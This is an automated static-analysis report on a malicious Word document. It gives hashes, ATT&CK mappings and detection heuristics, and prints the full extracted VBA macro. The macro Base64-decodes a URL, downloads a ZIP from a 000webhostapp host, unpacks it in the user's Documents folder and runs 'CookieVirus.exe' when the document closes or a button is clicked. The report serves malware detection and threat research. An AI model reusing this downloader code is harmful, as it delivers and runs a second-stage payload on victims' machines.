Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dbfa43e9a61059ee…

MALICIOUS

Office (OOXML)

615.8 KB Created: 2021-02-24 13:52:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2022-06-20
MD5: 03a36dd36be47d6ecfad1f22e504aad3 SHA-1: 7d09703a3127e9ec300bafb79a4e3611affa2cd3 SHA-256: dbfa43e9a61059eeaf90bfadebf9f4e573aeb2910924c58e28d7e2d3f87f48cd
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059.003 Windows Command Shell

The sample contains a VBA macro that utilizes WScript.Shell and cmd.exe to download a ZIP archive from the URL "https://kithuatphanmem.000webhostapp.com/test2.zip". The macro then attempts to save this archive to disk as "C:\Users\<user>\Documents\test.zip" and extract its contents to "C:\Users\<user>\Documents\Test\", indicating it functions as a downloader for a second-stage payload.

Heuristics 10

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set BinaryStream = CreateObject("ADODB.Stream")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            SaveBinaryData Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA=="), objWinHttp.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set BinaryStream = CreateObject("ADODB.Stream")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        oShell.Run "cmd.exe /c cd C:\Users\" & User & "\Documents\Test\netcoreapp3.1 && CookieVirus.exe", 0, True
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://Motobit.cz Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • https://kithuatphanmem.000webhostapp.com/test2.zipReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5547 bytes
SHA-256: b74bcb28fb6499f58529b9d66bdbadfccbec02956579cdf62a7ae8821d6bfa78
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Function SaveBinaryData(FileName, Data)

' adTypeText for binary = 1
Const adTypeText = 1
Const adSaveCreateOverWrite = 2

' Create Stream object
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")

' Specify stream type - we want To save Data/string data.
BinaryStream.Type = adTypeText

' Open the stream And write binary data To the object
BinaryStream.Open
BinaryStream.Write Data

' Save binary data To disk
BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
End Function

Function abcRun()
    Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
    Set oShell = CreateObject("WScript.Shell")
    User = oShell.ExpandEnvironmentStrings("%USERNAME%")
    URL = Base64Decode("aHR0cHM6Ly9raXRodWF0cGhhbm1lbS4wMDB3ZWJob3N0YXBwLmNvbS90ZXN0Mi56aXA=")
    Dim FSO
    Set FSO = CreateObject("Scripting.FileSystemObject")
    If FSO.FileExists(Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==")) = False Then
        objWinHttp.Open "GET", URL, False
        objWinHttp.send ""
        SaveBinaryData Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA=="), objWinHttp.responseBody
        ZipFile = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==")
        ExtractTo = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1xUZXN0XA==")
        If Not FSO.FolderExists(ExtractTo) Then
           FSO.CreateFolder (ExtractTo)
        End If
        Set objShell = CreateObject("Shell.Application")
        Set FilesInZip = objShell.NameSpace(ZipFile).items
        objShell.NameSpace(ExtractTo).CopyHere (FilesInZip)
    End If
    Set FSO = Nothing
    Set objShell = Nothing
    oShell.Run "cmd.exe /c cd C:\Users\" & User & "\Documents\Test\netcoreapp3.1 && CookieVirus.exe", 0, True
End Function


Sub MakeImageInvisible(img)
Set objWord = CreateObject("Word.Application")
Application.ActiveDocument.InlineShapes.AddPicture _
                 img, False, True
End Sub


Private Sub CommandButton1_Click()
abcRun
MakeImageInvisible Base64Decode("aHR0cHM6Ly9pLmltZ3VyLmNvbS9QU0RlUmZJLnBuZw==")
MakeImageInvisible Base64Decode("aHR0cHM6Ly9pLmltZ3VyLmNvbS9MbmJlRDVZLnBuZw==")
MakeImageInvisible Base64Decode("aHR0cHM6Ly9pLmltZ3VyLmNvbS9jR2NEenlwLnBuZw==")
MakeImageInvisible Base64Decode("aHR0cHM6Ly9pLmltZ3VyLmNvbS9FQzN6ejc1LnBuZw==")
MakeImageInvisible Base64Decode("aHR0cHM6Ly9pLmltZ3VyLmNvbS94dTI3SDN3LnBuZw==")
End Sub


Private Sub Document_Close()
abcRun
End Sub

Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  'remove white spaces, If any
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  'The source must consists from groups with Len of 4 chars
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  ' Now decode each group:
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    ' Each data group encodes up To 3 actual bytes.
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3
      ' Convert each character into 6 bits of data, And add it To
      ' an integer For temporary storage.  If a character is a '=', there
      ' is one fewer data byte.  (There can only be a maximum of 2 '=' In
      ' the whole string.)

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    'Hex splits the long To 6 groups with 4 bits
    nGroup = Hex(nGroup)
    
    'Add leading zeros
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    'Convert the 3 byte hex integer (6 chars) To 3 characters
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    'add numDataBytes characters To out string
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function


Private Sub Document_Open()

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B036D3DD-D63E-464E-9BD1-3EFB5CE0E2A5}{62B34654-1066-4254-9B45-47EB938B4699}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Application.Visible = True
End Sub

Private Sub Label1_Click()

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 44032 bytes
SHA-256: 12eeced1268f90c5c5060a8b8799e016a18685a1dbfc01a9cdff0a6a59891912

Open this report in the interactive analyzer, or submit your own file for analysis.